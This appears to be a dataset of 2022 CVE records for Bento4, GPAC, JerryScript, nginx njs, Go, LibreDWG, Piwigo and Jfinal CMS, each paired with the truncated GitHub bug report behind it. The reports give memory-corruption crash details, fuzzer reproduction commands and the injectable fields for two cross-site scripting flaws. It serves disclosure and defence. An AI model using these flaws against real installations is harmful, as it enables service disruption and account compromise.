branch [d02ef82](https://github.com/axiomatic-systems/Bento4/commit/d02ef8230a8fee4904a7... | allocator is out of memory in /Source/C++/Core/Ap4Array.h:172 | https://api.github.com/repos/axiomatic-systems/Bento4/issues/702/comments | 0 | 2022-05-08T09:35:50Z | 2022-05-08T09:35:50Z | https://github.com/axiomatic-systems/Bento4/issues/702 | 1,228,840,395 | 702 |
CVE-2022-31287 | 2022-06-10T18:15:08.900 | An issue was discovered in Bento4 v1.2. There is an allocation size request error in /Ap4RtpAtom.cpp. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/703"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:1.2:*:*:*:*:*:*:*",
"matchCriteriaId": "F7A3D679-CF47-47D3-AED0-94803AC18598",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding... | https://github.com/axiomatic-systems/Bento4/issues/703 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"axiomatic-systems",
"Bento4"
] | SUMMARY: AddressSanitizer: requested allocation size 0xfffffffffffffffd in /Source/C++/Core/Ap4RtpAtom.cpp:49
- Version
```
$ ./mp42hls
MP4 To HLS File Converter - Version 1.2
(Bento4 Version 1.6.0.0)
(c) 2002-2018 Axiomatic Systems, LLC
```
branch [d02ef82](https://github.com/axiomatic-systems/Bento4/commit... | requested allocation size 0xfffffffffffffffd in /Source/C++/Core/Ap4RtpAtom.cpp:49 | https://api.github.com/repos/axiomatic-systems/Bento4/issues/703/comments | 0 | 2022-05-08T09:38:48Z | 2022-05-08T09:38:48Z | https://github.com/axiomatic-systems/Bento4/issues/703 | 1,228,840,962 | 703 |
CVE-2021-40678 | 2022-06-14T13:15:07.937 | In Piwigo 11.5.0, there exists a persistent cross-site scripting in the single mode function through /admin.php?page=batch_manager&mode=unit. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Piwigo/Piwigo/issues/1476"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:piwigo:piwigo:11.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B6BC6DF8-D938-4413-B4C7-132BCC938E68",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | https://github.com/Piwigo/Piwigo/issues/1476 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Piwigo",
"Piwigo"
] | **Description:**
In the single mode function of the Piwigo system, modifying the author parameter of the picture can cause persistent cross-site scripting
**Vulnerable Instances:**
/admin.php?page=batch_manager&mode=unit
 | https://api.github.com/repos/Piwigo/Piwigo/issues/1476/comments | 0 | 2021-09-06T02:58:29Z | 2021-09-07T01:10:19Z | https://github.com/Piwigo/Piwigo/issues/1476 | 988,691,714 | 1,476 |
CVE-2021-41458 | 2022-06-16T10:15:09.053 | In GPAC MP4Box v1.1.0, there is a stack buffer overflow at src/utils/error.c:1769 which leads to a denial of service vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1910"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:mp4box:1.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "AAC8DC7B-40A5-4CE7-B534-D17901AECE66",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding"... | https://github.com/gpac/gpac/issues/1910 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [x] I looked for a similar issue and couldn't find any.
- [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [x] I give enough info... | SEGV on unknown address in MP4Box at src/utils/error.c:1769 in gf_blob_get | https://api.github.com/repos/gpac/gpac/issues/1910/comments | 0 | 2021-09-07T16:19:06Z | 2021-09-09T13:04:24Z | https://github.com/gpac/gpac/issues/1910 | 990,148,297 | 1,910 |
CVE-2021-41682 | 2022-06-20T14:15:08.947 | There is a heap-use-after-free at ecma-helpers-string.c:1940 in ecma_compare_ecma_non_direct_strings in JerryScript 2.4.0 | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/4747"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:2.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1E97C345-3992-457E-928D-05A0B97B2A5F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | https://github.com/jerryscript-project/jerryscript/issues/4747 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] |
###### JerryScript revision
3bcd48f
###### Build platform
Ubuntu 20.04.2 LTS (Linux 5.11.0-25-generic x86_64)
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-... | heap-use-after-free in ecma_compare_ecma_non_direct_strings | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4747/comments | 0 | 2021-08-24T03:35:55Z | 2021-11-02T07:40:08Z | https://github.com/jerryscript-project/jerryscript/issues/4747 | 977,668,295 | 4,747 |
CVE-2021-41683 | 2022-06-20T14:15:08.997 | There is a stack-overflow at ecma-helpers.c:326 in ecma_get_lex_env_type in JerryScript 2.4.0 | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/4745"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:2.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1E97C345-3992-457E-928D-05A0B97B2A5F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | https://github.com/jerryscript-project/jerryscript/issues/4745 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] |
###### JerryScript revision
```
3bcd48f7
```
###### Build platform
```
Ubuntu 20.04.2 LTS (Linux 5.11.0-25-generic x86_64)
```
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-co... | stack-overflow in ecma_get_lex_env_type | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4745/comments | 0 | 2021-08-24T03:27:50Z | 2021-10-20T14:03:14Z | https://github.com/jerryscript-project/jerryscript/issues/4745 | 977,665,470 | 4,745 |
CVE-2022-31306 | 2022-06-21T13:15:08.237 | Nginx NJS v0.7.2 was discovered to contain a segmentation violation in the function njs_array_convert_to_slow_array at src/njs_array.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nginx/njs/commit/81af26364c21c196dd21fb5e14c7fa9ce7debd17"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:0.7.2:*:*:*:*:*:*:*",
"matchCriteriaId": "C1858598-78C6-451F-81B4-57F6D636EBAC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": nul... | https://github.com/nginx/njs/issues/481 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"nginx",
"njs"
] | ### Environment
```
OS : Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit : f65981b0b8fcf02d69a40bc934803c25c9f607ab
Version : 0.7.2
Build :
NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
NJS_CFLAGS="$NJS_CFLAGS -... | SEGV njs_array.c:151:13 in njs_array_convert_to_slow_array | https://api.github.com/repos/nginx/njs/issues/481/comments | 0 | 2022-03-02T11:45:41Z | 2022-05-07T01:57:07Z | https://github.com/nginx/njs/issues/481 | 1,157,083,066 | 481 |
CVE-2022-31307 | 2022-06-21T13:15:08.287 | Nginx NJS v0.7.2 was discovered to contain a segmentation violation in the function njs_string_offset at src/njs_string.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nginx/njs/commit/eafe4c7a326b163612f10861392622b5da5b1792"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:0.7.2:*:*:*:*:*:*:*",
"matchCriteriaId": "C1858598-78C6-451F-81B4-57F6D636EBAC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": nul... | https://github.com/nginx/njs/issues/482 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"nginx",
"njs"
] | ### Environment
```
OS : Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit : f65981b0b8fcf02d69a40bc934803c25c9f607ab
Version : 0.7.2
Build :
NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
NJS_CFLAGS="$NJS_CFLAGS -... | SEGV njs_string.c:2535:18 in njs_string_offset | https://api.github.com/repos/nginx/njs/issues/482/comments | 0 | 2022-03-02T11:46:11Z | 2022-04-28T00:08:07Z | https://github.com/nginx/njs/issues/482 | 1,157,083,610 | 482 |
CVE-2022-32414 | 2022-06-21T13:15:08.437 | Nginx NJS v0.7.2 was discovered to contain a segmentation violation in the function njs_vmcode_interpreter at src/njs_vmcode.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nginx/njs/commit/31ed93a5623f24ca94e6d47e895ba735d9d97d46"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:0.7.2:*:*:*:*:*:*:*",
"matchCriteriaId": "C1858598-78C6-451F-81B4-57F6D636EBAC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": nul... | https://github.com/nginx/njs/issues/483 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"nginx",
"njs"
] | ### Environment
```
OS : Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit : f65981b0b8fcf02d69a40bc934803c25c9f607ab
Version : 0.7.2
Build :
NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
NJS_CFLAGS="$NJS_CFLAGS -... | SEGV njs_vmcode.c:802:27 in njs_vmcode_interpreter | https://api.github.com/repos/nginx/njs/issues/483/comments | 0 | 2022-03-02T11:46:31Z | 2022-04-26T23:10:07Z | https://github.com/nginx/njs/issues/483 | 1,157,083,929 | 483 |
CVE-2022-29526 | 2022-06-23T17:15:12.747 | Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/golang/go/issues/52313"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Mailing List",
"Third Party Adv... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:golang:go:*:*:*:*:*:*:*:*",
"matchCriteriaId": "397D7E19-74A1-4CCC-BF0A-D5A03151F171",
"versionEndExcluding": "1.17.10",
"versionEndIncluding": null,
"versionStartExcluding":... | https://github.com/golang/go/issues/52313 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"golang",
"go"
] | The `syscall.Faccessat` function checks whether the calling process can access a file.
`Faccessat` contains a bug where it checks a file's group permission bits if the process's user is a member of the *process's* group rather than a member of the *file's* group.
https://github.com/golang/go/blob/c9fe126c8bf25d14... | syscall: Faccessat checks wrong group | https://api.github.com/repos/golang/go/issues/52313/comments | 10 | 2022-04-12T20:16:17Z | 2023-06-22T22:01:33Z | https://github.com/golang/go/issues/52313 | 1,202,343,099 | 52,313 |
CVE-2022-33024 | 2022-06-23T17:15:13.993 | There is an Assertion `int decode_preR13_entities(BITCODE_RL, BITCODE_RL, unsigned int, BITCODE_RL, BITCODE_RL, Bit_Chain *, Dwg_Data *' failed at dwg2dxf: decode.c:5801 in libredwg v0.12.4.4608. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/LibreDWG/libredwg/issues/492"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gnu:libredwg:0.12.4.4608:*:*:*:*:*:*:*",
"matchCriteriaId": "205AD0A5-0F64-4F38-A208-B41F8C1E8952",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/LibreDWG/libredwg/issues/492 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"LibreDWG",
"libredwg"
] | ### system info
Ubuntu x86_64, clang 6.0, dwg2dxf([0.12.4.4608](https://github.com/LibreDWG/libredwg/releases/tag/0.12.4.4608))
### Command line
./programs/dwg2dxf -b -m @@ -o /dev/null
### output
dwg2dxf: decode.c:5801: int decode_preR13_entities(BITCODE_RL, BITCODE_RL, unsigned int, BITCODE_RL, BITCODE_RL, ... | Assertion dwg2dxf: decode.c:5801: int decode_preR13_entities(BITCODE_RL, BITCODE_RL, unsigned int, BITCODE_RL, BITCODE_RL, Bit_Chain *, Dwg_Data *): Assertion `!dat->bit' failed. Aborted. | https://api.github.com/repos/LibreDWG/libredwg/issues/492/comments | 4 | 2022-06-07T01:43:47Z | 2022-12-15T08:04:07Z | https://github.com/LibreDWG/libredwg/issues/492 | 1,262,615,938 | 492 |
CVE-2022-33025 | 2022-06-23T17:15:14.033 | LibreDWG v0.12.4.4608 was discovered to contain a heap-use-after-free via the function decode_preR13_section at decode_r11.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/LibreDWG/libredwg/issues/487"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gnu:libredwg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6FE47054-8B69-4569-934E-EE67FC88DD36",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": n... | https://github.com/LibreDWG/libredwg/issues/487 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"LibreDWG",
"libredwg"
] | ### system info
Ubuntu x86_64, clang 6.0, dwg2dxf([0.12.4.4608](https://github.com/LibreDWG/libredwg/releases/tag/0.12.4.4608))
### Command line
./programs/dwg2dxf -b -m @@ -o /dev/null
### AddressSanitizer output
==8989==ERROR: AddressSanitizer: heap-use-after-free on address 0x7ffff7e35838 at pc 0x0000007106... | heap-use-after-free exists in the function decode_preR13_section in decode_r11.c | https://api.github.com/repos/LibreDWG/libredwg/issues/487/comments | 3 | 2022-06-07T01:31:30Z | 2022-12-15T08:44:07Z | https://github.com/LibreDWG/libredwg/issues/487 | 1,262,609,657 | 487 |
CVE-2022-33026 | 2022-06-23T17:15:14.073 | LibreDWG v0.12.4.4608 was discovered to contain a heap buffer overflow via the function bit_calc_CRC at bits.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/LibreDWG/libredwg/issues/484"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gnu:libredwg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6FE47054-8B69-4569-934E-EE67FC88DD36",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": n... | https://github.com/LibreDWG/libredwg/issues/484 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"LibreDWG",
"libredwg"
] | ### system info
Ubuntu x86_64, clang 6.0, dwg2dxf([0.12.4.4608](https://github.com/LibreDWG/libredwg/releases/tag/0.12.4.4608))
### Command line
./programs/dwg2dxf -b -m @@ -o /dev/null
### AddressSanitizer output
==8982==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x616000000592 at pc 0x000000528... | heap-buffer-overflow exists in the function bit_calc_CRC in bits.c | https://api.github.com/repos/LibreDWG/libredwg/issues/484/comments | 3 | 2022-06-07T01:21:33Z | 2022-12-15T08:15:29Z | https://github.com/LibreDWG/libredwg/issues/484 | 1,262,604,647 | 484 |
CVE-2022-33027 | 2022-06-23T17:15:14.113 | LibreDWG v0.12.4.4608 was discovered to contain a heap-use-after-free via the function dwg_add_handleref at dwg.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/LibreDWG/libredwg/issues/490"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gnu:libredwg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6FE47054-8B69-4569-934E-EE67FC88DD36",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": n... | https://github.com/LibreDWG/libredwg/issues/490 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"LibreDWG",
"libredwg"
] | ### system info
Ubuntu x86_64, clang 6.0, dwg2dxf([0.12.4.4608](https://github.com/LibreDWG/libredwg/releases/tag/0.12.4.4608))
### Command line
./programs/dwg2dxf -b -m @@ -o /dev/null
### AddressSanitizer output
==8997==ERROR: AddressSanitizer: heap-use-after-free on address 0x604000000730 at pc 0x0000005173... | heap-use-after-free exists in the function dwg_add_handleref in dwg.c | https://api.github.com/repos/LibreDWG/libredwg/issues/490/comments | 3 | 2022-06-07T01:40:09Z | 2022-12-15T08:40:34Z | https://github.com/LibreDWG/libredwg/issues/490 | 1,262,614,234 | 490 |
CVE-2022-33028 | 2022-06-23T17:15:14.150 | LibreDWG v0.12.4.4608 was discovered to contain a heap buffer overflow via the function dwg_add_object at decode.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/LibreDWG/libredwg/issues/489"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gnu:libredwg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6FE47054-8B69-4569-934E-EE67FC88DD36",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": n... | https://github.com/LibreDWG/libredwg/issues/489 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"LibreDWG",
"libredwg"
] | ### system info
Ubuntu x86_64, clang 6.0, dwg2dxf([0.12.4.4608](https://github.com/LibreDWG/libredwg/releases/tag/0.12.4.4608))
### Command line
./programs/dwg2dxf -b -m @@ -o /dev/null
### AddressSanitizer output
==8995==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62e00000ac80 at pc 0x0000004bc... | heap-buffer-overflow exists in the function dwg_add_object in decode.c | https://api.github.com/repos/LibreDWG/libredwg/issues/489/comments | 3 | 2022-06-07T01:37:45Z | 2022-12-15T08:41:39Z | https://github.com/LibreDWG/libredwg/issues/489 | 1,262,613,027 | 489 |
CVE-2022-33032 | 2022-06-23T17:15:14.190 | LibreDWG v0.12.4.4608 was discovered to contain a heap-buffer-overflow via the function decode_preR13_section_hdr at decode_r11.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/LibreDWG/libredwg/issues/488"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gnu:libredwg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6FE47054-8B69-4569-934E-EE67FC88DD36",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": n... | https://github.com/LibreDWG/libredwg/issues/488 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"LibreDWG",
"libredwg"
] | ### system info
Ubuntu x86_64, clang 6.0, dwg2dxf([0.12.4.4608](https://github.com/LibreDWG/libredwg/releases/tag/0.12.4.4608))
### Command line
./programs/dwg2dxf -b -m @@ -o /dev/null
### AddressSanitizer output
==8993==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000000144 at pc 0x000000706... | heap-buffer-overflow exists in the function decode_preR13_section_hdr in decode_r11.c | https://api.github.com/repos/LibreDWG/libredwg/issues/488/comments | 3 | 2022-06-07T01:34:49Z | 2022-12-15T08:43:05Z | https://github.com/LibreDWG/libredwg/issues/488 | 1,262,611,394 | 488 |
CVE-2022-33033 | 2022-06-23T17:15:14.230 | LibreDWG v0.12.4.4608 was discovered to contain a double-free via the function dwg_read_file at dwg.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/LibreDWG/libredwg/issues/493"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gnu:libredwg:0.12.4.4608:*:*:*:*:*:*:*",
"matchCriteriaId": "205AD0A5-0F64-4F38-A208-B41F8C1E8952",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/LibreDWG/libredwg/issues/493 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"LibreDWG",
"libredwg"
] | ### system info
Ubuntu x86_64, clang 6.0, dwg2dxf([0.12.4.4608](https://github.com/LibreDWG/libredwg/releases/tag/0.12.4.4608))
### Command line
./programs/dwg2dxf -b -m @@ -o /dev/null
### AddressSanitizer output
==9541==ERROR: AddressSanitizer: attempting double-free on 0x61a000000100 in thread T0:
#0 0... | double-free exists in the function dwg_read_file in dwg.c | https://api.github.com/repos/LibreDWG/libredwg/issues/493/comments | 2 | 2022-06-08T01:47:21Z | 2022-12-01T08:12:49Z | https://github.com/LibreDWG/libredwg/issues/493 | 1,264,080,771 | 493 |
CVE-2022-33034 | 2022-06-23T17:15:14.270 | LibreDWG v0.12.4.4608 was discovered to contain a stack overflow via the function copy_bytes at decode_r2007.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/LibreDWG/libredwg/issues/494"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gnu:libredwg:0.12.4.4608:*:*:*:*:*:*:*",
"matchCriteriaId": "205AD0A5-0F64-4F38-A208-B41F8C1E8952",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/LibreDWG/libredwg/issues/494 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"LibreDWG",
"libredwg"
] | ### system info
Ubuntu x86_64, clang 6.0, dwg2dxf([0.12.4.4608](https://github.com/LibreDWG/libredwg/releases/tag/0.12.4.4608))
### Command line
./programs/dwg2dxf -b -m @@ -o /dev/null
### AddressSanitizer output
==9543==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffffc8f0 at pc 0x00000072... | stack-buffer-overflow exists in the function copy_bytes in decode_r2007.c | https://api.github.com/repos/LibreDWG/libredwg/issues/494/comments | 3 | 2022-06-08T01:51:23Z | 2022-12-15T08:47:23Z | https://github.com/LibreDWG/libredwg/issues/494 | 1,264,082,849 | 494 |
CVE-2022-33113 | 2022-06-23T17:15:14.793 | Jfinal CMS v5.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the keyword text field under the publish blog module. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/jflyfox/jfinal_cms/issues/39"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*",
